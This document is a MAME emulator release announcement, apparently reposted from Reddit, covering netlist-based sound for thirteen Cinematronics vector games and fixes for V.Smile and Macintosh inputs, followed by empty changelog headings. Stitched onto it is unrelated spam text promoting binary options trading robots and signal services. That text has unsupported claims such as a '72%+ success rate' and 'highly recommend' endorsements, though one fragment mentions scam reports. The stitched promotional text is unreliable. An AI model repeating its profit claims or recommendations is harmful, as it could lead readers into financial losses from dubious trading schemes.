Fans of classic vector arcade games are in for a treat this month. Former project coordinator Aaron Giles has contributed netlist-based sound emulation for thirteen Cinematronics vector games: Space War, Barrier, Star Hawk, Speed Freak, Star Castle, War of the Worlds, Sundance, Tail Gunner, Rip Off, Armor Attack, Warrior, Solar Quest and Boxing Bugs. This resolves long-standing issues with the previous simulation based on playing recorded samples. Colin Howell has also refined the sound emulation for Midway’s 280-ZZZAP and Gun Fight.
V.Smile joystick inputs are now working for all dumped cartridges, and with fixes for ROM bank selection the V.Smile Motion software is also usable. The accelerometer-based V.Smile Motion controller is not emulated, but the software can all be used with the standard V.Smile joystick controller. Another pair of systems with inputs that now work is the original Macintosh (128K/512K/512Ke) and Macintosh Plus. These systems’ keyboards are now fully emulated, including the separate numeric keypad available for the original Macintosh, the Macintosh Plus keyboard with integrated numeric keypad, and a few European ISO layout keyboards for the original Macintosh. There are still some emulation issues, but you can play Beyond Dark Castle with MAME’s Macintosh Plus emulation again.
In other home computer emulation news, MAME’s SAM Coupé driver now supports a number of peripherals that connect to the rear expansion port, a software list containing IRIX hard disk installations for SGI MIPS workstations has been added, and tape loading now works for the Specialist system (a DIY computer designed in the USSR).
Of course, there’s far more to enjoy, and you can read all about it in the whatsnew.txt file, or get the source and 64-bit Windows binary packages from the download page. (For brevity, promoted V.Smile software list entries and new Barcrest MPU4 clones made up from existing dumps have been omitted here.)

MAME Testers Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

Software list items promoted to working

New NOT_WORKING software list additions

Merged pull requests

submitted by cuavas to emulation [link] [comments]


Disclaimer: binary option robot software review. BinaryRobot is a free system, which means there is no sign-up fee. Since its launch at the beginning of the year, BinaryRobot has proven itself responsive and committed through timely replies to enquiries. Advantages of our binary options robot: you can set your own ...
How Option Robot works. The software makes deals automatically, but it doesn't decide what those deals should be – you do that. You set all the parameters so that Option Robot knows when it should make a deal, how big the deal should be, what limits to set, and every other option you can specify with that broker. Your chosen broker probably offers trades on a wide range of indices, but ...
Access free binary options signals with a consistent 72%+ success rate and join over 20,000 members currently profiting from binary options. Get the signals needed to supplement your binary options trading strategy. No software required! Binary options signals are provided to traders to notify them when a new trading opportunity is available. My signals are extremely easy to follow and only ...
The software works based on a sophisticated trading algorithm, so these sorts of services let traders control the portfolio trade themselves. A trustworthy binary options robot handles everything from the most basic to the most advanced tasks. Mainly, the algorithm allows an auto-trading bot to compare trading data with previous years' data alongside current market analysis. Likewise, a ...
Despite being a new binary option trading system, OptionRobot has already caught the attention of many binary options traders, who have been quick to recognize this potentially lucrative piece of software with its highly customizable service. We look forward to monitoring this exciting new robot's win rates in the coming months and highly recommend that traders check it out, as it offers a ...
This Binary Option Auto Trading software is widely discussed among traders because of the volume of scam reports around it. This trading bot makes money by following two methods; among other things, it makes money when traders lose their trades. Every time you place a trade with the Binary Option Auto Trading bot, you end up with zero ...
The binary options software is available for any device. Nowadays it is especially important for the private trader to have a flexible trading platform, which means the platform should also be usable on the road. With the IQ Option software, you can access your portfolio at any time, 24 hours a day, 7 days a week. Download the app for your mobile device. The advantage is that you only need one login to ...
Most of these packages also provide the option to send signals to your email. Signals: this type of binary options product is generally simpler than the software approach. You will receive emails either in a members area or in your inbox, and the emails contain signals that tell you whether to put or call. Auto-trading software: this type of binary options product I ...
This software works with MetaTrader 4, so in order to use it you have to download and sign up for an MT4 demo (100% free). Step 1: download MetaTrader 4. Step 2: Trade Assistant – Trend Detector – Booster. These Trade Assistants will work with every top-rated software on Binary Today. You can choose the Trade Assistant that works for the expiry time of your choice, or the original Trade ...
We have tried, tested and reviewed the many types of software and know which companies offer the best binary robot trading experience and which software outshines the others. We believe that investing apps are a great way to save time and make money, and our advice and recommendations are designed to assist you in the quest to become the best binary options robot trader.

